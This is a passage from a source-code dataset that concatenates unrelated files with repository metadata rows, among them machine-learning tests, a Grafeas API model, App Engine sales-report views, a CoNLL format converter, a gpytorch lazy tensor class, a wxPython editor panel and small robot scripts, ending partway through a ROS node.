edges = make_edges_2x2()
G = [np.vstack([make_grid_edges(x), edges]) for x in X]
# reshape / flatten x and y
X_flat = [x.reshape(-1, 1) for x in X]
Y_flat = [y.ravel() for y in Y]
X_ = list(zip(X_flat, G, [4 * 4 for x in X_flat]))
latent_svm.fit(X_, Y_flat)
assert_equal(latent_svm.score(X_, Y_flat), 1)
def test_latent_node_boxes_standard_latent_features():
# learn the "easy" 2x2 boxes dataset.
# we make it even easier now by adding features that encode the correct
# latent state. This basically tests that the features are actually used
X, Y = make_simple_2x2(seed=1, n_samples=20, n_flips=6)
latent_crf = LatentNodeCRF(n_labels=2, n_hidden_states=2, n_features=1,
latent_node_features=True)
one_slack = OneSlackSSVM(latent_crf)
n_slack = NSlackSSVM(latent_crf)
subgradient = SubgradientSSVM(latent_crf, max_iter=100)
for base_svm in [one_slack, n_slack, subgradient]:
base_svm.C = 10
latent_svm = LatentSSVM(base_svm,
latent_iter=10)
G = [make_grid_edges(x) for x in X]
# make edges for hidden states:
edges = make_edges_2x2()
G = [np.vstack([make_grid_edges(x), edges]) for x in X]
# reshape / flatten x and y
X_flat = [x.reshape(-1, 1) for x in X]
# augment X with the features for hidden units
X_flat = [np.vstack([x, y[::2, ::2].reshape(-1, 1)])
for x, y in zip(X_flat, Y)]
Y_flat = [y.ravel() for y in Y]
X_ = list(zip(X_flat, G, [2 * 2 for x in X_flat]))
latent_svm.fit(X_[:10], Y_flat[:10])
assert_array_equal(latent_svm.predict(X_[:10]), Y_flat[:10])
assert_equal(latent_svm.score(X_[:10], Y_flat[:10]), 1)
    # we actually become perfect ^^
assert_true(.98 < latent_svm.score(X_[10:], Y_flat[10:]) <= 1)
def test_latent_node_boxes_edge_features():
# learn the "easy" 2x2 boxes dataset.
# smoketest using a single constant edge feature
X, Y = make_simple_2x2(seed=1, n_samples=40)
latent_crf = EdgeFeatureLatentNodeCRF(n_labels=2, n_hidden_states=2, n_features=1)
base_svm = OneSlackSSVM(latent_crf)
base_svm.C = 10
latent_svm = LatentSSVM(base_svm,
latent_iter=10)
G = [make_grid_edges(x) for x in X]
# make edges for hidden states:
edges = make_edges_2x2()
G = [np.vstack([make_grid_edges(x), edges]) for x in X]
# reshape / flatten x and y
X_flat = [x.reshape(-1, 1) for x in X]
Y_flat = [y.ravel() for y in Y]
#X_ = zip(X_flat, G, [2 * 2 for x in X_flat])
# add edge features
X_ = [(x, g, np.ones((len(g), 1)), 4) for x, g in zip(X_flat, G)]
latent_svm.fit(X_[:20], Y_flat[:20])
assert_array_equal(latent_svm.predict(X_[:20]), Y_flat[:20])
assert_equal(latent_svm.score(X_[:20], Y_flat[:20]), 1)
# test that score is not always 1
assert_true(.98 < latent_svm.score(X_[20:], Y_flat[20:]) < 1)
| bsd-2-clause | -7,646,659,545,827,525,000 | 34.756345 | 86 | 0.590148 | false |
grafeas/client-python | grafeas/models/api_vulnerability_type.py | 1 | 5261 | # coding: utf-8
"""
An API to insert and retrieve metadata on cloud artifacts.
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: v1alpha1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class ApiVulnerabilityType(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'cvss_score': 'float',
'severity': 'VulnerabilityTypeSeverity',
'details': 'list[VulnerabilityTypeDetail]'
}
attribute_map = {
'cvss_score': 'cvss_score',
'severity': 'severity',
'details': 'details'
}
def __init__(self, cvss_score=None, severity=None, details=None): # noqa: E501
"""ApiVulnerabilityType - a model defined in Swagger""" # noqa: E501
self._cvss_score = None
self._severity = None
self._details = None
self.discriminator = None
if cvss_score is not None:
self.cvss_score = cvss_score
if severity is not None:
self.severity = severity
if details is not None:
self.details = details
@property
def cvss_score(self):
"""Gets the cvss_score of this ApiVulnerabilityType. # noqa: E501
The CVSS score for this Vulnerability. # noqa: E501
:return: The cvss_score of this ApiVulnerabilityType. # noqa: E501
:rtype: float
"""
return self._cvss_score
@cvss_score.setter
def cvss_score(self, cvss_score):
"""Sets the cvss_score of this ApiVulnerabilityType.
The CVSS score for this Vulnerability. # noqa: E501
:param cvss_score: The cvss_score of this ApiVulnerabilityType. # noqa: E501
:type: float
"""
self._cvss_score = cvss_score
@property
def severity(self):
"""Gets the severity of this ApiVulnerabilityType. # noqa: E501
:return: The severity of this ApiVulnerabilityType. # noqa: E501
:rtype: VulnerabilityTypeSeverity
"""
return self._severity
@severity.setter
def severity(self, severity):
"""Sets the severity of this ApiVulnerabilityType.
:param severity: The severity of this ApiVulnerabilityType. # noqa: E501
:type: VulnerabilityTypeSeverity
"""
self._severity = severity
@property
def details(self):
"""Gets the details of this ApiVulnerabilityType. # noqa: E501
All information about the package to specifically identify this vulnerability. One entry per (version range and cpe_uri) the package vulnerability has manifested in. # noqa: E501
:return: The details of this ApiVulnerabilityType. # noqa: E501
:rtype: list[VulnerabilityTypeDetail]
"""
return self._details
@details.setter
def details(self, details):
"""Sets the details of this ApiVulnerabilityType.
All information about the package to specifically identify this vulnerability. One entry per (version range and cpe_uri) the package vulnerability has manifested in. # noqa: E501
:param details: The details of this ApiVulnerabilityType. # noqa: E501
:type: list[VulnerabilityTypeDetail]
"""
self._details = details
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(ApiVulnerabilityType, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ApiVulnerabilityType):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| apache-2.0 | -6,049,898,657,363,391,000 | 29.766082 | 187 | 0.592663 | false |
araseyuta/Newsstand-analytics | app/views.py | 1 | 13173 | import os
import re
import csv
from django.shortcuts import render_to_response
from django.http import HttpResponseRedirect
from django.http import HttpResponse
from google.appengine.ext import db
from google.appengine.ext.db import djangoforms
from google.appengine.api import urlfetch
from google.appengine.api import users
from google.appengine.api import mail
from app import models
from google.appengine.ext import webapp, db
from google.appengine.ext.webapp.util import run_wsgi_app
from google.appengine.ext.webapp import template
import datetime
import random
def index(request):
user();
return render_to_response('app/index.html',{'a':random.randint(1,10),},)
#####################################################################
#### ####
#### Function:For Register Login User & Login Time
#### Using Each Function
####
#### Purpose:
#### Save User & DateTime into datastore
####
#### ####
#####################################################################
def user():
user = users.get_current_user()
query = db.Query(models.User).filter('user_id =', user.user_id())
e = query.get()
    #Already this AppleID of SKU exists => Check the Price only...
if e:
time = datetime.datetime.now()
time += datetime.timedelta(0,0,0,0,0,9)
e.datetime = time
else:
e = models.User()
e.email = user.email()
e.user_id = user.user_id()
e.nickname = user.nickname()
time = datetime.datetime.now()
time += datetime.timedelta(0,0,0,0,0,9)
e.datetime = time
user_address = "Admin<[email protected]>"
sender_address = "Admin<[email protected]>"
subject = "[Newsstand Analytics Test]%s started using! "% user.email()
body = """
%s has started using of [Newsstand Analytics Test]
"""% user.email()
mail.send_mail(sender_address, user_address, subject, body)
e.put()
#####################################################################
#### ####
####    Function:For Calculation of Total Sales for Each App
#### URL: /totalsale/
####
#### Purpose:
#### GET:Show the Form in order to Upload TSV file(AppleReport)
####
#### POST:
#### 1:Load TSV File & Load SKU list from Datastore
#### 2:Calclate each SKU and each subscriptin units in the target file
####    3:multiply each SKU's Units by its SKU cost (to estimate total sales for each SKU)
#### 4:Summing each SKU sales to parent SKU
####
#### ####
#####################################################################
def totalsales(request):
if request.method == 'GET':
user();
return render_to_response('app/totalsales.html',{'a':random.randint(1,10),},)
elif request.method == 'POST':
NS = {};
SKUlist = [];
ParentSKU={};
SKU2PriceDict={};
SKU2ParentDict={};
query = models.SKU.all().order('SKU')
#Make list of SKU
for e in query:
if e.SKU == 'SKU':
continue;
#if SKU is ns_ . . . => Add to ParentSKUlist
if e.SKU[0:3] == "ns_":
ParentSKU[e.SKU] = 0;
#if SKU is not ns_ . . . => Add to SKUlist
else:
SKUlist.append(e.SKU);
SKU2PriceDict[e.SKU] = e.price;
SKU2ParentDict[e.SKU] =e.ParentIdentifier;
#Make Dictionary of SKU
for SKU in SKUlist:
NS[SKU] = 0;
#check selecting file
while True:
try:
r = request.FILES['file']
break;
except:
                return render_to_response('app/totalsales.html',{'try':'Please select your AppleReport. . .',},)
# except Exception as e:
# return render_to_response('app/totalsales.html',{'try':'Prease select your AppleReport. . .','e':e},)
#Load TSV file (OF APPLE REPORT)
r = request.FILES['file'];
lines = r.readlines();
count = 0;
#Load Each Record. . .
for line in lines:
count = count +1;
AppleReport = line[:-1].split('\t');
if len(AppleReport)<18:
continue;
SKU = AppleReport[2];
Unit = AppleReport[7];
            #if SKU column means AppDownloadCount -> Add the Units. . .
for SKUMatch in SKUlist:
if SKU == SKUMatch:
NS[SKU] = NS[SKU] + int(Unit);
        #After Adding All Records of Units --> Calc The Price of Each SKU
for SKU in SKUlist:
NS[SKU] = NS[SKU] * SKU2PriceDict[SKU];
        #Sum each SKU's sales into its parent App
for SKU in SKUlist:
ParentSKU[SKU2ParentDict[SKU]]= ParentSKU[SKU2ParentDict[SKU]] + NS[SKU];
return render_to_response('app/totalsales.html',
{
'POST':True,
'r':r.name,
'NS':ParentSKU.items(),
},)
#####################################################################
#### ####
####    Function:For Calculation of App Download count
#### URL: /app/
####
#### Purpose:
#### GET:Show the Form in order to Upload TSV file(AppleReport)
####
#### POST:
#### 1:Load TSV File & Load SKU list from Datastore
#### 2:Checking the Each Record of AppleReport
#### >if SKU( such as ns_application_name) is listed :: Add the Units
####
#### ####
#####################################################################
def app(request):
if request.method == 'GET':
user();
return render_to_response('app/app.html',{'a':random.randint(1,10),},)
elif request.method == 'POST':
NS = {};
SKUlist=[];
query = models.SKU.all().order('SKU')
#Make list of SKU
for e in query:
if e.SKU[0:3] == "ns_":
SKUlist.append(e.SKU);
#Make Dictionary of SKU
for SKU in SKUlist:
NS[SKU] = 0;
#check selecting file
while True:
try:
r = request.FILES['file']
break;
except:
                return render_to_response('app/app.html',{'try':'Please select your AppleReport. . .',},)
# except Exception as e:
# return render_to_response('app/app.html',{'try':'Prease select your AppleReport. . .','e':e},)
#Load TSV file (OF APPLE REPORT)
r = request.FILES['file'];
lines = r.readlines();
count = 0;
#Load Each Record. . .
for line in lines:
count = count +1;
AppleReport = line[:-1].split('\t');
if len(AppleReport)<18:
continue;
SKU = AppleReport[2];
Unit = AppleReport[7];
            #if SKU column means AppDownloadCount -> Add the Units. . .
if SKU[0:3] == "ns_":
for SKUMatch in SKUlist:
if SKU == SKUMatch:
if AppleReport[6] == "1F":
NS[SKU] = NS[SKU] + int(Unit);
return render_to_response('app/app.html',
{
'POST':True,
'r':r.name,
'NS':NS.items(),
},)
#####################################################################
#### ####
####    Function:For Calculation of Weekly Report
#### URL: /sales/
####
#### Purpose:
#### GET:Show the Form in order to Upload TSV file(AppleReport)
####
#### POST:
#### 1:Load TSV File & Load SKU list from Datastore
#### 2:Checking the Each Record of AppleReport
#### >if SKU is listed :: Add the Units
#### 3:After adding Units all of records, Calc the Price
#### ####
#####################################################################
def sales(request):
if request.method == 'GET':
user();
return render_to_response('app/sales.html',{'a':random.randint(1,10),},)
elif request.method == 'POST':
POST = True;
NS = {};
SKUlist=[];
SKU2PriceDict = {};
query = models.SKU.all().order('SKU')
#Make list of SKU
for e in query:
if e.SKU == "SKU":
continue;
if e.SKU[0:3] == "ns_":
continue;
SKUlist.append(e.SKU);
SKU2PriceDict[e.SKU] = e.price;
#Make Dictionary of SKU
for SKU in SKUlist:
NS[SKU] = {'SKU':SKU,
'New':{'price':0,'units':0},
'Renewal':{'price':0,'units':0}
}
#check selecting file
while True:
try:
r = request.FILES['file']
break;
except:
                return render_to_response('app/sales.html',{'try':'Please select your AppleReport. . .',},)
# except Exception as e:
# return render_to_response('app/sales.html',{'try':'Prease select your AppleReport. . .','e':e},)
#Load TSV file (OF APPLE REPORT)
r = request.FILES['file'];
lines = r.readlines();
count = 0;
#Load Each Record. . .
for line in lines:
count = count +1;
AppleReport = line[:-1].split('\t');
SKU = AppleReport[2];
Unit = AppleReport[7];
Subscription = AppleReport[18];
#if Subscription colm is NULL -> Skip. . .
if Subscription == 'New':
Subscription = Subscription
elif Subscription == 'Renewal':
Subscription = Subscription
else:
continue
            #if SKU column means Header -> Skip. . .
if SKU == "SKU":
continue;
            #if SKU column means AppDownloadCount -> Skip. . .
if SKU[0:3] == "ns_":
continue;
#Check, is SKU in a list? -> IF exists, Add the Units
for SKUMatch in SKUlist:
if SKU == SKUMatch:
NS[SKU][Subscription]['units'] = NS[SKU][Subscription]['units'] + int(Unit);
        #After Adding All Records of Units --> Calculate the Price. . .
for SKU in SKUlist:
NS[SKU]['New']['price'] = NS[SKU]['New']['units'] * SKU2PriceDict[SKU];
NS[SKU]['Renewal']['price'] = NS[SKU]['Renewal']['units'] * SKU2PriceDict[SKU];
return render_to_response('app/sales.html',
{
'POST':POST,
'r':r.name,
'NS':NS.items(),
},)
#####################################################################
#### ####
#### Function:For Register New SKU
#### URL: /register/
####
#### Purpose:
####    GET:Show the Form in order to Upload CSV file
####
#### POST:
#### 1:Load CSV File
#### 2:Search AppleID of SKU In Datastore
#### >if New :: Add to the datastore
#### >if Already exists :: Check price only
#### ####
#####################################################################
def register(request):
if request.method == 'GET':
user();
return render_to_response('app/register.html',{'a':random.randint(1,10),},)
elif request.method == 'POST':
POST = True;
SKUlist = [];
NewSKUlist = [];
#check selecting file
while True:
try:
r = request.FILES['file']
break;
except:
                return render_to_response('app/register.html',{'try':'Please select your AppleReport. . .',},)
# except Exception as e:
# return render_to_response('app/register.html',{'try':'Prease select your AppleReport. . .','e':e},)
#OpenFile
r = request.FILES['file'];
lines = r.readlines();
#Check Return code
if len(lines)==1:
lines = lines[0].split(chr(13));
if len(lines)==1:
lines = lines[0].split(chr(10));
value = 1;#for Debug
#Read each line => and Check AppleID in datastore
for line in lines:
AppleReport = line.split(',');
if len(AppleReport)<18:
continue;
if AppleReport[14] == 'Apple Identifier':
continue;
query = db.Query(models.SKU).filter('AppleID =', int(AppleReport[14]))
e = query.get()
            #Already this AppleID of SKU exists => Check the Price only...
if e:
e.price = int(AppleReport[15])
value = value + 1;
            #Find New AppleID of SKU => Save to Datastore
else:
e = models.SKU()
e.SKU = AppleReport[2]
e.price = int(AppleReport[15])
e.ParentIdentifier = AppleReport[17]
e.AppleID = int(AppleReport[14])
NewSKUlist.append(e);
value = value + 1;
#Both OLD and NEW, Put to the Datastore and Push to the SKULIST...
e.put()
SKUlist.append(e)
return render_to_response('app/register.html',{
'POST':POST,
'r':r.name,
'NewSKUlist':NewSKUlist,
'SKUlist':SKUlist,
},)
| apache-2.0 | -2,135,317,619,511,722,800 | 29.282759 | 110 | 0.48774 | false |
TurkuNLP/Finnish-dep-parser | conv_u_09.py | 1 | 1760 | import sys
import argparse
ID,FORM,LEMMA,UCPOS,UPOS,UFEAT,UHEAD,UDEPREL,UDEPS,UMISC=range(10)
ID,FORM,LEMMA,PLEMMA,POS,PPOS,FEAT,PFEAT,HEAD,PHEAD,DEPREL,PDEPREL=range(12)
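# Editor's note (illustrative): the two assignments above index the 10-column
# CoNLL-U row and the 12-column CoNLL-09 row respectively. Only ID, FORM and
# LEMMA overlap (positions 0-2), so both sets of column constants stay valid
# and the conversion below simply picks fields by these offsets.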
if __name__=="__main__":
parser = argparse.ArgumentParser(description='Convert conllu to conll09 and back. Infers the direction on its own if no arguments given.')
parser.add_argument('--output-format', default=None, help='Output format can be "u" or "09". If the input is in this format already, the conversion is a no-op and simply passes data through.')
parser.add_argument('--drop-comments', default=False, action="store_true", help='Remove comments from the data')
args = parser.parse_args()
for line in sys.stdin:
line=line.strip()
if not line:
print
elif line.startswith('#'):
if not args.drop_comments:
print line
else:
cols=line.split('\t')
if len(cols)==10:
#UD in
if args.output_format=="u":
#UD out, no-op
print '\t'.join(cols)
else:
#UD -> 09
print '\t'.join((cols[ID],cols[FORM],cols[LEMMA],cols[LEMMA],cols[UCPOS],cols[UCPOS],cols[UFEAT],cols[UFEAT],cols[UHEAD],cols[UHEAD],cols[UDEPREL],cols[UDEPREL],'_','_'))
else:
#09 in
assert len(cols) in (12,13,14), cols
if args.output_format=="09":
#09 out, no-op
print '\t'.join(cols)
else:
#09 -> UD
print '\t'.join((cols[ID],cols[FORM],cols[PLEMMA],cols[PPOS],'_',cols[PFEAT],cols[PHEAD],cols[PDEPREL],'_','_'))
| gpl-2.0 | -676,060,049,442,735,100 | 43 | 196 | 0.543182 | false |
jrg365/gpytorch | gpytorch/lazy/mul_lazy_tensor.py | 1 | 6031 | #!/usr/bin/env python3
import torch
from ..utils.broadcasting import _matmul_broadcast_shape
from ..utils.memoize import cached
from .lazy_tensor import LazyTensor
from .root_lazy_tensor import RootLazyTensor
class MulLazyTensor(LazyTensor):
def _check_args(self, left_lazy_tensor, right_lazy_tensor):
if not isinstance(left_lazy_tensor, LazyTensor) or not isinstance(right_lazy_tensor, LazyTensor):
return "MulLazyTensor expects two LazyTensors."
if left_lazy_tensor.shape != right_lazy_tensor.shape:
return "MulLazyTensor expects two LazyTensors of the same size: got {} and {}.".format(
left_lazy_tensor, right_lazy_tensor
)
def __init__(self, left_lazy_tensor, right_lazy_tensor):
"""
Args:
            - left_lazy_tensor, right_lazy_tensor (LazyTensor) - The two LazyTensors to multiply elementwise.
"""
if not isinstance(left_lazy_tensor, RootLazyTensor):
left_lazy_tensor = left_lazy_tensor.root_decomposition()
if not isinstance(right_lazy_tensor, RootLazyTensor):
right_lazy_tensor = right_lazy_tensor.root_decomposition()
super(MulLazyTensor, self).__init__(left_lazy_tensor, right_lazy_tensor)
self.left_lazy_tensor = left_lazy_tensor
self.right_lazy_tensor = right_lazy_tensor
def _get_indices(self, row_index, col_index, *batch_indices):
left_res = self.left_lazy_tensor._get_indices(row_index, col_index, *batch_indices)
right_res = self.right_lazy_tensor._get_indices(row_index, col_index, *batch_indices)
return left_res * right_res
def _matmul(self, rhs):
output_shape = _matmul_broadcast_shape(self.shape, rhs.shape)
output_batch_shape = output_shape[:-2]
is_vector = False
if rhs.ndimension() == 1:
rhs = rhs.unsqueeze(1)
is_vector = True
# Here we have a root decomposition
if isinstance(self.left_lazy_tensor, RootLazyTensor):
left_root = self.left_lazy_tensor.root.evaluate()
left_res = rhs.unsqueeze(-2) * left_root.unsqueeze(-1)
rank = left_root.size(-1)
n = self.size(-1)
m = rhs.size(-1)
# Now implement the formula (A . B) v = diag(A D_v B)
left_res = left_res.view(*output_batch_shape, n, rank * m)
left_res = self.right_lazy_tensor._matmul(left_res)
left_res = left_res.view(*output_batch_shape, n, rank, m)
res = left_res.mul_(left_root.unsqueeze(-1)).sum(-2)
# This is the case where we're not doing a root decomposition, because the matrix is too small
else:
res = (self.left_lazy_tensor.evaluate() * self.right_lazy_tensor.evaluate()).matmul(rhs)
res = res.squeeze(-1) if is_vector else res
return res
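    # Editor's note (sketch, not from the original source): _matmul uses the
    # Hadamard-product identity (A * B) v = diag(A diag(v) B^T). With the root
    # decomposition A = L L^T the product is evaluated through L without ever
    # forming the dense n x n matrix, so intermediates stay of size n x (rank * m).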
def _mul_constant(self, other):
return self.__class__(self.left_lazy_tensor._mul_constant(other), self.right_lazy_tensor)
def _quad_form_derivative(self, left_vecs, right_vecs):
if left_vecs.ndimension() == 1:
left_vecs = left_vecs.unsqueeze(1)
right_vecs = right_vecs.unsqueeze(1)
*batch_shape, n, num_vecs = left_vecs.size()
if isinstance(self.right_lazy_tensor, RootLazyTensor):
right_root = self.right_lazy_tensor.root.evaluate()
left_factor = left_vecs.unsqueeze(-2) * right_root.unsqueeze(-1)
right_factor = right_vecs.unsqueeze(-2) * right_root.unsqueeze(-1)
right_rank = right_root.size(-1)
else:
right_rank = n
eye = torch.eye(n, dtype=self.right_lazy_tensor.dtype, device=self.right_lazy_tensor.device)
left_factor = left_vecs.unsqueeze(-2) * self.right_lazy_tensor.evaluate().unsqueeze(-1)
right_factor = right_vecs.unsqueeze(-2) * eye.unsqueeze(-1)
left_factor = left_factor.view(*batch_shape, n, num_vecs * right_rank)
right_factor = right_factor.view(*batch_shape, n, num_vecs * right_rank)
left_deriv_args = self.left_lazy_tensor._quad_form_derivative(left_factor, right_factor)
if isinstance(self.left_lazy_tensor, RootLazyTensor):
left_root = self.left_lazy_tensor.root.evaluate()
left_factor = left_vecs.unsqueeze(-2) * left_root.unsqueeze(-1)
right_factor = right_vecs.unsqueeze(-2) * left_root.unsqueeze(-1)
left_rank = left_root.size(-1)
else:
left_rank = n
eye = torch.eye(n, dtype=self.left_lazy_tensor.dtype, device=self.left_lazy_tensor.device)
left_factor = left_vecs.unsqueeze(-2) * self.left_lazy_tensor.evaluate().unsqueeze(-1)
right_factor = right_vecs.unsqueeze(-2) * eye.unsqueeze(-1)
left_factor = left_factor.view(*batch_shape, n, num_vecs * left_rank)
right_factor = right_factor.view(*batch_shape, n, num_vecs * left_rank)
right_deriv_args = self.right_lazy_tensor._quad_form_derivative(left_factor, right_factor)
return tuple(list(left_deriv_args) + list(right_deriv_args))
def _expand_batch(self, batch_shape):
return self.__class__(
self.left_lazy_tensor._expand_batch(batch_shape), self.right_lazy_tensor._expand_batch(batch_shape)
)
def diag(self):
res = self.left_lazy_tensor.diag() * self.right_lazy_tensor.diag()
return res
@cached
def evaluate(self):
return self.left_lazy_tensor.evaluate() * self.right_lazy_tensor.evaluate()
def _size(self):
return self.left_lazy_tensor.size()
def _transpose_nonbatch(self):
# mul.lazy_tensor only works with symmetric matrices
return self
def representation(self):
"""
Returns the Tensors that are used to define the LazyTensor
"""
res = super(MulLazyTensor, self).representation()
return res
def representation_tree(self):
return super(MulLazyTensor, self).representation_tree()
| mit | -299,347,341,140,442,200 | 43.345588 | 111 | 0.628917 | false |
GitExl/WhackEd4 | src/whacked4/ui/editors/miscframe.py | 1 | 7083 | #!/usr/bin/env python
#coding=utf8
from whacked4 import utils
from whacked4.ui import editormixin, windows
import copy
import wx
class MiscFrame(editormixin.EditorMixin, windows.MiscFrameBase):
"""
Misc editor window.
"""
def __init__(self, parent):
windows.MiscFrameBase.__init__(self, parent)
editormixin.EditorMixin.__init__(self)
self.SetIcon(wx.Icon('res/editor-misc.ico'))
self.patch = None
self.selected_index = -1
self.data_type = None
def build(self, patch):
"""
@see: EditorMixin.build
"""
self.patch = patch
self.misclist_build()
def update(self):
"""
@see: EditorMixin.update
"""
pass
def misc_select(self, event):
"""
Selects a new ammo entry.
"""
self.selected_index = event.GetIndex()
self.update_properties()
def update_properties(self):
"""
Updates the displayed properties of the currently selected entry.
"""
if not self.patch:
return
misc_data_keys = list(self.patch.engine.misc_data.keys())
key = misc_data_keys[self.selected_index]
data = self.patch.engine.misc_data[key]
value = self.patch.misc[key]
self.Value.Disable()
self.Value.ChangeValue('')
self.ValueEnabled.Disable()
self.ValueEnabled.SetValue(False)
self.data_type = data['type']
if data['type'] == 'boolean':
self.ValueEnabled.Enable()
if value == data['on']:
self.ValueEnabled.SetValue(True)
else:
self.ValueEnabled.SetValue(False)
else:
self.Value.Enable()
self.Value.ChangeValue(str(value))
def misclist_build(self):
"""
Builds the misc. data list.
"""
self.MiscList.ClearAll()
# Add column headers if necessary.
if self.MiscList.GetColumnCount() == 0:
self.MiscList.InsertColumn(0, 'Name', width=76)
self.MiscList.InsertColumn(1, 'Value', width=67)
misc_values = list(self.patch.engine.misc_data.values())
for misc_index in range(len(misc_values)):
misc_value = misc_values[misc_index]
self.MiscList.InsertItem(misc_index, misc_value['name'])
self.misclist_update_row(misc_index)
self.list_autosize(self.MiscList)
self.MiscList.Select(0, True)
def misclist_update_row(self, row_index):
"""
Updates a row in the misc list.
"""
data_keys = list(self.patch.engine.misc_data.keys())
data_key = data_keys[row_index]
data = self.patch.engine.misc_data[data_key]
value = self.patch.misc[data_key]
self.MiscList.SetItem(row_index, 0, data['name'])
if data['type'] == 'boolean':
if value == data['on']:
str_value = 'On'
else:
str_value = 'Off'
else:
str_value = str(value)
self.MiscList.SetItem(row_index, 1, str_value)
def misclist_resize(self, event):
"""
        Resize the misc value column to fill the remaining width.
"""
if not self.MiscList.GetColumnCount():
return
column_width = self.MiscList.GetClientSize()[0] - 4
self.MiscList.SetColumnWidth(0, 200)
self.MiscList.SetColumnWidth(1, column_width - 200)
def set_value(self, event):
"""
Validates and sets a misc. property.
"""
self.undo_add()
window_id = event.GetId()
window = self.FindWindowById(window_id)
if self.data_type == 'int' or self.data_type == 'byte':
value = utils.validate_numeric(window)
elif self.data_type == 'float':
value = utils.validate_numeric_float(window)
else:
value = window.GetValue()
key_list = list(self.patch.engine.misc_data.keys())
key = key_list[self.selected_index]
# Clamp values to their data type range.
if self.data_type == 'int':
if value < -0x80000000:
value = -0x80000000
elif value > 0x80000000:
value = 0x80000000
window.ChangeValue(str(value))
elif self.data_type == 'byte':
if value < 0:
value = 0
elif value > 255:
value = 255
window.ChangeValue(str(value))
self.patch.misc[key] = value
self.is_modified(True)
self.misclist_update_row(self.selected_index)
def set_bool_value(self, event):
"""
Validates and sets a misc. boolean property.
"""
self.undo_add()
key_list = list(self.patch.engine.misc_data.keys())
key = key_list[self.selected_index]
data = self.patch.engine.misc_data[key]
if self.ValueEnabled.GetValue():
self.patch.misc[key] = data['on']
else:
self.patch.misc[key] = data['off']
self.is_modified(True)
self.misclist_update_row(self.selected_index)
def misc_action(self, event):
"""
Performs the default action for a misc. item.
"""
key_list = list(self.patch.engine.misc_data.keys())
key = key_list[self.selected_index]
data = self.patch.engine.misc_data[key]
# Booleans are toggled.
if data['type'] == 'boolean':
self.undo_add()
value = self.patch.misc[key]
if value == data['on']:
self.patch.misc[key] = data['off']
elif value == data['off']:
self.patch.misc[key] = data['on']
self.is_modified(True)
self.update_properties()
self.misclist_update_row(self.selected_index)
# Other values shift focus to the value to edit.
else:
self.Value.SetFocus()
self.Value.SetSelection(-1, -1)
def restore(self, event):
"""
        Restore the selected misc item to its engine state.
"""
self.undo_add()
key_list = list(self.patch.engine.misc_data.keys())
key = key_list[self.selected_index]
self.patch.misc[key] = copy.copy(self.patch.engine.misc[key])
self.misclist_update_row(self.selected_index)
self.update_properties()
def undo_restore_item(self, item):
"""
@see: EditorMixin.undo_restore_item
"""
self.patch.misc[item['key']] = item['item']
self.misclist_update_row(item['index'])
self.update_properties()
self.is_modified(True)
def undo_store_item(self):
"""
@see: EditorMixin.undo_store_item
"""
key_list = list(self.patch.engine.misc_data.keys())
key = key_list[self.selected_index]
return {
'item': self.patch.misc[key],
'index': self.selected_index,
'key': key
}
| bsd-2-clause | 5,606,244,057,570,175,000 | 26.034351 | 73 | 0.550755 | false |
Skaper/RMCStudio | scrips_robot/old/progSound.py | 1 | 1658 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from pygame import mixer
import threading, random, socket
play = 0
file = 0
sock = socket.socket()
sock.bind(('', 6000))
sock.listen(1)
conn, addr = sock.accept()
#sock.settimeout(.01)
def soundPlayer(arg3, soundPlayer_stop):
global file
global play
while 1:
if play == 1:
mixer.init(16000, -16, 1, 2048)
mixer.music.load("/home/pi/r2d2/sound/"+str(file)+".MP3")
print file
mixer.music.play()
while mixer.music.get_busy() == True:
if play==0:
mixer.music.stop()
continue
file = random.randint(0, 10) #Random sound
#play = 0
soundPlayer_stop = threading.Event()
#soundPlayer=threading.Thread(target=soundPlayer)
soundPlayer=threading.Thread(target=soundPlayer, args=(2, soundPlayer_stop))
soundPlayer.start()
def simplePlay(file):
mixer.init(16000, -16, 1, 2048)
mixer.music.load("/home/pi/r2d2/sound/"+file+".MP3")
mixer.music.play()
while mixer.music.get_busy() == True:
continue
#simplePlay("ready")
print "> OK. Start!"
print '> Connected:', addr
def reStart():
global conn, addr
conn.close()
conn, addr = sock.accept()
while True:
#data = conn.recv(16384)
data = raw_input()
if not data:
print '> RESTART'
reStart()
if data == 'PLAYsound' and play == 0:
print "> Play sound"
file = str(random.randint(0, 10))
play=1 #On playing
if data == 'STOPsound':
print "> Stop sound"
play = 0
conn.close() | apache-2.0 | -6,256,733,322,677,014,000 | 21.726027 | 76 | 0.571773 | false |
anthony-jclark/adabot | adabot_localization/scripts/velocity_smoother.py | 1 | 1405 | #!/usr/bin/env python
"""
This node is responsible for smoothing the velocity odometry
data using a moving average.
"""
from collections import deque
import rospy
from std_msgs.msg import Float64
from nav_msgs.msg import Odometry
MAX_LEN = 10
vxs = deque(maxlen=MAX_LEN)
vxs.append(0)
total = 0
def odometry_callback(data):
global total
# Get the oldest speed value (if it exists)
old_val = vxs.popleft() if len(vxs) == MAX_LEN else 0
# Get the new speed value from the given data
new_val = data.twist.twist.linear.x
# Replace the oldest value with the new value
total = total - old_val + new_val
vxs.append(new_val)
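# Editor's note (clarifying, not in the original node): `total` is kept in sync with
# the deque, so the value published below is simply total / len(vxs), i.e. the
# arithmetic mean of the last MAX_LEN odometry speed samples.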
def publish_smoothed_velocity():
rate = rospy.Rate(30)
smooth_publisher = rospy.Publisher('adabot/smooth_velocity', Float64, queue_size=1)
